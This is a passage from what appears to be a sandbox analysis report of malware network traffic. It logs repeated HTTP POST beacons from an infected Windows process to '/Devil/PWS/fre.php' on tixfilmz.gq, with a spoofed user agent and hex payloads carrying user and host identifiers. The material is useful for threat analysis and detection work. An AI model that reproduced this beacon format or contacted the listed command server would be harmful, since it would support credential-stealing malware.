                  Aug 11, 2022 06:42:12.678615093 CEST1026OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz992547DESKTOP-716T771k08F9C4E9C79A3B52B3F739430UoSRS
                  Aug 11, 2022 06:42:12.770203114 CEST1027INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EcIokiggUeWK7stOcHYaTR9Nfu%2Bw1B0KmIgjz5XBrLi5RlXYADH7OvXr%2FdJTFK4ComS7WX9Kl%2BawzsVO2xC9i7YvxqK%2B2HlQKPAZKDJzBamMX%2Fg9bDYXNFLl8qJ2TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4da52d366927-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349743188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:14.045455933 CEST1028OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 190
                  Connection: close
                  Aug 11, 2022 06:42:14.062895060 CEST1028OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz992547DESKTOP-716T771+08F9C4E9C79A3B52B3F739430PUvyv
                  Aug 11, 2022 06:42:14.156966925 CEST1029INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjmr%2BbPvZ8rJwWgffZI2qiEiavpl6O22f%2BcT7CB7tnbyuPOA357Zf2FNxPVWIvbMb8Ndmpi8h9MOOPpjYMpVs8g7ts%2B3HNgz92kV0CK9kX0Lqi1trxOEgmN37zwvtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dadc8f29a21-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.349752188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:24.044622898 CEST1045OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:24.061861992 CEST1045OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:24.175990105 CEST1045INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxjXC6ddbJvscFIvG67IgynL2NjLWwlHrf9JNEEpnZhz8GESrErKZ%2BoLBEDeoVxgiwJfVn0Q6Rqu8otxBsF8PXAbqITi5CmVFXMAKxISbPKHDQgqi9tRB4N6epT2qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dec49fdbb79-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.349753188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:25.207102060 CEST1047OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:25.223962069 CEST1047OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:25.319336891 CEST1048INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tZTVwoY2KgEFJBINwtqpf4sdTlqYetdrjrRijQZX5Mweayj6DCpYK6tzY8LykMUrMSDsSPGBVilViH644WA9fbXc0g6ig6D5Ubp07wbwXjkLbh86zB8cT4bqPxyqsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4df39917927a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.349754188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:26.308314085 CEST1049OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:26.325208902 CEST1049OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:26.415497065 CEST1050INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DLqIBQAFj4gswdHMZuHcj91in6E5f6X3rFMoKk2nEIGUMSZ2Nxf9I4OnjRKO0naduLb%2BueBvh97gRd%2BU%2FaetEzg1vRoUKSp6dcqJzvCnpBITGp00qUPZwKWw%2Bj2BeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dfa7bdcbb7a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.349755188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:27.395951986 CEST1051OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:27.413217068 CEST1051OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:27.495721102 CEST1052INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjqGLd6i9zMP8bcIwUWRGVed2wLUSsm3niQjeu0rUJ%2FcbE6oMHKVIi%2BOomjB7LoB%2F4A1uT%2BXqpcZ%2BWLmbZT%2B4dqHCLfO7Pfl1GolCHzGQ5dzsPMqGjmZ7b6xaz7QbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e013cb5693a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.349756188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:28.447484016 CEST1052OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:28.464462996 CEST1053OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:28.548753977 CEST1053INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DT2h4w8l%2FP6VjmZr53R42CuyMFDOYqdNxPcSNr2UXMwc5QDOgwXzVoomGjhqGdK%2BBspu1iOAHpJuUv%2BjCNwmP8uG1MIyC10AF9Et%2FDju8VAihCOxHNiSXGyG%2BZWINg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e07da98929c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.349757188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:29.610435963 CEST1054OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:29.627373934 CEST1055OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:29.709315062 CEST1055INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6a1VTXiCKYgnYEO3%2BLpn9oT%2BJ3bOdwQwxtmEYnRXBoF1b2vToJ1LtvkZ1ubI9oYCjF4ZxHdY27qlfBR97QKEKZpuLDGAPkXyaO5gRLySOhDtATM7v%2Bp%2B2VfFc2lo9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e0f190d9119-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.349758188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:30.656105042 CEST1056OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:30.672983885 CEST1056OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:30.750089884 CEST1057INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pD6Ln9hJRHjfUxa%2BWE43LFbFNzvbGolnLYC5OP0S2USHgWDZw%2FHEYVnJyWrqjinKtzJoFB9DDiks%2BfRYqYcO6kXROO6nZQW0t1xoGJxTokqwElIuBPwLJT667KYPdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e159a1e915c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.349759188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:31.695873976 CEST1058OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:31.719686031 CEST1058OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:31.798857927 CEST1059INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LklYK3MOypuF1%2BVh2sdCtr7LVNtvn%2F19I6qHXiEHaYlXr1GlNl5FV85gZ1YwjH%2BWP3mMaxA%2FOiai0RRg1k%2FJj1BTJT0GFYgOIysXL7HlbvsawYmrc2QRDHTejstVTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e1c1b099182-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.349760188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:32.923604012 CEST1060OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:32.941155910 CEST1060OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:33.030349016 CEST1061INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JvllRByjfWTtFWpXg1mKOcP73Q4nqUNK9RIelUCIa9JSpEbSgDMsJfWvwFLMqFKuhwzLWUjzARThWb5gHEZ%2B2nNJeog1S%2BjB0M5cAqiaMNoKriWuzsc3a6MuwY9C4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e23c9e2995a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.349761188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:34.002289057 CEST1062OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:34.019488096 CEST1062OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:34.089981079 CEST1063INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HH6Mm6OzeElam41sNPkt1IqJqvterxwkCTH6ccOLDK2%2FP45mgrw2tmT%2FgIuKaBnXiwgm7yZxh1c1twzMg8H%2BZxDubCT3iEDeETTRJWPEP0dPg7eaMyzfviA1nd6Nhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e2a8f32bbd9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.349744188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:15.052087069 CEST1030OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:15.069155931 CEST1030OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:15.165085077 CEST1031INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7ABObsXbQcHdnhtJPI8XreO6Qwq10iYwVNciyewQ4rLsb7Pcx09BNdkyXLXs9ydJd52ebLqkg3Ye7uOK2DeXYCKDW1duAcls9jdV3KDrYwI1Ddm7lqJGDb603ptNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4db41affbbf7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.349762188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:35.961536884 CEST1064OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:35.978749990 CEST1064OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:36.063500881 CEST1065INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BDDcJA9loNSYiH0%2BzGFmVbKmzSb%2Ff5hpB1MM20uTsti37mQygz7a4phBDXPmpiRJpWyppkWO1aCufCSBc61S3fu9WYSM8a3mgQ9baO8%2FIg4rJNzKepSDyKU5TN5C7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e36c9bb5c50-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.349763188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:39.324990988 CEST1066OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:39.341988087 CEST1066OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
